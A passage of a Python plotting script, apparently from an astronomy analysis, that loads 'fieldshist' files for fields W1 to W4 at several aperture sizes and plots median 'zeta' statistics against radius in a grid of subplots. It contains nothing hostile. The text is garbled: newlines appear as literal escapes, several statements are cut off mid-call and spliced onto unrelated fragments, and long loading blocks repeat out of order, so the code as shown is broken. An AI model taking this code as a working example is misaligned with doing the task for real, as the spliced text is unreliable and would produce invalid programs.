usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], 
unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % 
ax = plt.subplot(457)\nrangemax=4\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_{M^2_{rms}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 6\n\ncols=13\nload_all(cols)\n
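\n# panel (4,5,8): median zeta_{M^3} statistic (column 13)\n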
ax = plt.subplot(458)\nrangemax=6\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_{M^3}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 7\n\ncols=15\nload_all(cols)\n
\nax = plt.subplot(459)\nrangemax=6\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_{M^3_{rms}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\n\ncols=17\nload_all(cols)\n
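\n# panel (4,5,11): median zeta_{z/r} statistic (column 17)\n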
ax = plt.subplot(4,5,11)\nrangemax=2\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_\frac{z}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\n\ncols=19\nload_all(cols)\n
\nax = plt.subplot(4,5,12)\nrangemax=3\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_\frac{M}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n
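\n# panel (4,5,13): median zeta_{M^2/r} statistic (column 21)\n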
subplot = 10\n\ncols=21\nload_all(cols)\n\nax = plt.subplot(4,5,13)\nrangemax=6\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_\frac{M^2}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n
\nsubplot = 11\n\ncols=23\nload_all(cols)\n
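\n# panel (4,5,14): median zeta_{M^3/r} statistic (column 23)\n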
ax = plt.subplot(4,5,14)\nrangemax=6\nplt.xlim(25,140)\nplot_medians()\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\zeta_\frac{M^3}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\n\ncols=25\nload_all(cols)\n
\nx = linspace(0,3,500)\n\nax = plt.subplot(4,5,16)\nrangemax=4\nplt.xlim(25,140)\nplot_medians()\n#plt.scatter(x,gauss_q_W1_50(x),'b', linewidth=0.5)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'${\zeta_\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\n\ncols=27\nload_all(cols)\n
unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nx = linspace(0,3,500)\n\n\n\nplt.subplot(4,5,17)\nrangemax=5\nplt.xlim(25,140)\n#plt.scatter(45, 
np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,17)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'${\\zeta_\\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\n\ncols=29\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % 
(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = 
np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(4,5,18)\nrangemax=4\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(4,5,18)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, 
color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\n\ncols=31\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = 